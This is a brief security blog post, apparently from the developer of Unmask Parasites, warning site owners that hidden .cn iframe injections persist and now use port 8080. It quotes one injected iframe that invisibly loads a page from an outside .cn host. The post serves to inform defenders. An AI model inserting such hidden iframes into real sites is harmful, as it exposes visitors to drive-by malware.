Hidden CN Iframes Are Still Prevalent
This post is a reminder that .cn iframe attacks are still among leaders.
The URLs of malicious iframes change over the time. Hackers introduce new suffixes (campaigns?) like : mozila, banner, cocacola, pepsi, add more and more domain names.
Port 8080
Since the pepsi campaign they started using port 8080 in the URLs.
The currently form of the malicious code looks like this
< iframe src="http:// namegamestore .cn:8080/index.php" width=118 height=195 style="visibility: hidden"></iframe>
It is usually injected at the bottom of index (home) pages.
Continue »»
About this blog
Occasional posts from the developer of
Unmask Parasites about things that hackers already know and site owners should know (if they don't want to be victims).
Exploit reviews, security tips, and all that jazz.
